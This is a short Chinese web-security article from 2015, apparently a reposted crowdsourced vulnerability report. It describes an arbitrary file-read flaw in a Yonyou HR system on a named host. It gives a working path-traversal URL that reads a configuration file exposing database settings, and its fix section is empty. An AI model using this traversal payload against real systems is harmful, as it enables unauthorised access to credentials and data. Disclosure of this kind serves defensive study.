用友某系统任意文件读取 - 网站安全

用友某系统任意文件读取 - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-15 15:00 作者：阅读:次

[导读] 用友某系统任意文件，就拿某期的众测举例https: hr minshengec cn hrss login jsp 地址查看源代码http: wenku baidu com view 252b4448e518964bcf847ccb?fr=prin 百度到了配置文件然后慢慢构造https: hr mi...

用友某系统任意文件，就拿某期的众测举例

https://hr.minshengec.cn/hrss/login.jsp 地址

查看源代码

http://wenku.baidu.com/view/252b4448e518964bcf847ccb?fr=prin 百度到了配置文件

然后慢慢构造

https://hr.minshengec.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml

读取到了数据库

还有一个敏感信息泄露

https://hr.minshengec.cn/login.jsp

查看源代码

修复方案：

怎么修复呢？

某电子邮件客户端软件本地XSS漏洞 - 网站安全

编程中国论坛sql注入可获取Webshell - 网站安全 -

子栏目

用友某系统任意文件读取 - 网站安全 - 自学php

https://hr.minshengec.cn/hrss/login.jsp 地址

修复方案：

最新评论

添加评论

更多文章推荐

添加评论